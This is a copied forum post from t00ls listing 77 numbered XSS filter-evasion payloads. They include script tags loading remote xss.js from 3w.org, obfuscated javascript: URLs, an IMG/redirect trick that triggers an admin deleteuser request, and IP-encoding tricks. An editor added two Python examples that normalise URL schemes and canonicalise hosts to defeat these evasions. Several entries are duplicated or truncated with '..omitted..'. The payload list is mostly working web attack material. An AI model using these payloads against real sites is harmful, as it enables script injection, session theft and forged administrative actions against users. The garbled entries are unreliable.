12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
There seems to be relatively little XSS material on t00ls, so when I saw this good stuff I copied it over; not sure whether any of you need to mark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab to split the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab to split the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line injected JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Getting around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters are basically useless in China, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
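Most of the IMG, STYLE and url() entries above, from (3) to (19) and again in (40), (46) and (47), are the same javascript: or vbscript: URL hidden by a change of case, HTML character references, embedded tabs, newlines and carriage returns, null bytes, leading spaces, or the extra code points listed under (47). On the defending side the useful observation is that all of these collapse to one canonical string once the value is decoded and the ignorable characters are dropped, so that is the form to inspect. The Python below is an added example written for this edit; it is not code from the t00ls post or from the cheat sheet it was copied from, and the function names, the scheme allowlist and the set of stripped code points (taken from the ranges entry (47) names plus NUL) are assumptions.

```python
import html
import re

# Code points the entries above show browsers skipping inside a URL: NUL and
# 1-32 (tab, LF, CR, space and the other controls), 160 (no-break space),
# 8192-8207 (Unicode spaces and zero-width/format characters), 12288
# (ideographic space) and 65279 (BOM). These are the ranges entry (47) lists.
_IGNORED = set(range(0, 33)) | {160, 12288, 65279} | set(range(8192, 8208))
_STRIP_TABLE = {cp: None for cp in _IGNORED}

# Schemes a user-supplied link, image or style URL may use (assumed allowlist).
ALLOWED_SCHEMES = frozenset({"http", "https", "mailto"})

_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)


def normalize_url(value: str) -> str:
    """Undo the encodings from the list: decode HTML character references the
    way a browser does for an attribute value (&#106; &#x6A; and the forms
    without a semicolon), drop the ignorable code points, and remove quote
    characters wrapped around the value."""
    decoded = html.unescape(value)
    stripped = decoded.translate(_STRIP_TABLE)
    return stripped.strip("'\"")


def scheme_of(value: str) -> str:
    """Lower-cased scheme of the normalised value, or '' for a relative URL."""
    m = _SCHEME_RE.match(normalize_url(value))
    return m.group(1).lower() if m else ""


def is_safe_url(value: str, allowed=ALLOWED_SCHEMES) -> bool:
    """Accept relative URLs and URLs whose scheme is on the allowlist; reject
    javascript:, vbscript:, data: and every obfuscated spelling of them."""
    scheme = scheme_of(value)
    return scheme == "" or scheme in allowed


if __name__ == "__main__":
    # Constructed probes, using the spellings seen in the list above.
    for probe in ["JaVaScRiPt:alert('XSS')", "jav\tascript:alert('XSS')",
                  "java\0script:alert('XSS')", "&#106;avascript:alert('XSS')",
                  "vbscript:msgbox(\"XSS\")", "https://example.com/", "/about"]:
        print(f"{is_safe_url(probe)!s:5}  {probe!r}")
```

The check is deliberately scheme-only: `//3w.org/XSS/xss.js` from (25) passes because it has no scheme, and the meta-refresh value in (41) passes because its first scheme is `http`, so which hosts a link may point to and whether a refresh may carry a URL at all are separate decisions. Context-appropriate output encoding of the value still has to happen after this check; the normaliser only decides whether the scheme is acceptable.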
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE with expression
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
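Entries (68) to (76) are all one host written in a form that a plain string comparison against an allowlist does not recognise: a decimal, hex or octal dotted form, a mixed form with whitespace inside it, a dropped http: or www, or a trailing dot. The defence is to canonicalise the host before comparing it. The Python below is an added example written for this edit, not code from the post or from the cheat sheet; `canonical_host`, `link_host_allowed` and the allowed-host set are assumptions, and the numeric parsing follows the classic inet_aton rules (up to four dot-separated parts, 0x for hex, a leading zero for octal, the last part filling the remaining bytes), which is how browsers of that era resolved these forms.

```python
import re
from urllib.parse import urlsplit


def _parse_part(part: str) -> int:
    """One dotted component in inet_aton style: 0x.. hex, 0.. octal, else decimal."""
    if part[:2] == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def canonical_host(host: str) -> str:
    """Lowercase, drop whitespace and the trailing dot, and rewrite any numeric
    IPv4 spelling (decimal, hex, octal, mixed, fewer than four parts) as a plain
    dotted quad. Non-numeric names come back cleaned but otherwise unchanged."""
    host = re.sub(r"\s+", "", host).lower().rstrip(".")
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(parts):
        return host
    try:
        nums = [_parse_part(p) for p in parts]
    except ValueError:
        return host                      # not numeric: an ordinary hostname
    tail_bits = 8 * (5 - len(parts))     # the last part fills the remaining bytes
    if any(not 0 <= n <= 255 for n in nums[:-1]) or not 0 <= nums[-1] < (1 << tail_bits):
        return host
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << tail_bits) | nums[-1]
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def link_host_allowed(href: str, allowed_hosts) -> bool:
    """True if the link points at an allowlisted host once the host is
    canonicalised. Only web schemes and scheme-less //host/ links are
    considered; javascript:, vbscript:, data: and friends are rejected, and
    a bare path (no host) is treated as same-origin."""
    cleaned = re.sub(r"\s+", "", href)   # the "h\ntt\tp://6 6..." form in (73)
    parts = urlsplit(cleaned)
    if parts.scheme not in ("", "http", "https"):
        return False
    if parts.netloc == "":
        return parts.scheme == ""        # relative path, same origin
    if parts.hostname is None:
        return False
    allowed = {canonical_host(h) for h in allowed_hosts}
    return canonical_host(parts.hostname) in allowed


if __name__ == "__main__":
    # Constructed probes, the spellings used in (70) to (76).
    allowed = {"192.168.0.1", "www.google.com"}
    for href in ["http://3232235521", "http://0xc0.0xa8.0x00.0x01",
                 "http://0300.0250.0000.0001", "h\ntt\tp://6 6.000146.0x7.147/",
                 "//www.google.com/", "http://google.com/", "http://www.google.com./"]:
        print(f"{link_host_allowed(href, allowed)!s:5}  {href!r}")
```

Canonicalising the allowlist entries with the same function matters as much as canonicalising the link: an allowlist that contains `www.google.com.` with a trailing dot would otherwise never match anything.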
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14